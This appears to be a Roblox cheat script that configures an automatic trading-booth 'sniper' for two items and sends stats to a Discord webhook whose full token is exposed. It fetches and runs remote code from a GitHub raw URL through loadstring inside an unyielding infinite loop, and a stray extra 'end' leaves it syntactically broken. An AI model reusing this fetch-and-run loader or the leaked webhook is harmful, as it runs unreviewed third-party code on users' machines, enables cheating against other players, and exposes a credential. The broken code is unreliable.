while true do 
    game:GetService('StarterGui'):SetCore("DevConsoleVisible", true)
getgenv().Cynx = {
    boothSniper = {
        autoSnipe = true,
        snipeItem = {
                {Class = "Misc", Item = {id = "Gift Bag"}, Cost = 3300},
                {Class = "Misc", Item = {id = "Epic Glitch Core"}, Cost = 58400}, 
        },
        sendStats = true,
        webhookURL = "https://discord.com/api/webhooks/1212848643225296998/0bVliYrNlW2vat-Phqw_m8aNNVIAh9ejcl0FebXrSRusJWM-iVUYm5Li9Yo5oe2vTa0U",
    }
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/ParadoxHB/Snipe/main/Sniper"))()
end
end
